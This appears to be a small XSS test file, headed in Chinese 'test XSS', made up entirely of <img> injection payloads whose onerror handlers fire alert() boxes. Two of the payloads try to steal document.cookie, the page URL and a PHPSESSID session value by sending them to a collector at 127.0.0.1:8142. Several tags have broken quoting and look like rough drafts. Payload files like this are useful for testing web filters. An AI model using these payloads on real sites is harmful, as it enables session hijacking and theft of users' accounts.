测试XSS
<img src="http://127.0.0.1:8142?cookie="+encodeURIComponent(document.location.href)+"&cookie="+encodeURIComponent(document.cookie)" onerror=alert('1');/>
<img src='http://127.0.0.1:8142?cookie=${PHPSESSID}' onerror=alert('2');>
测试XSS
<img src='' onerror=alert('3');>
测试XSS
<img src="&"" onerror=alert('1');/>
<img src='' onerror=alert('2');>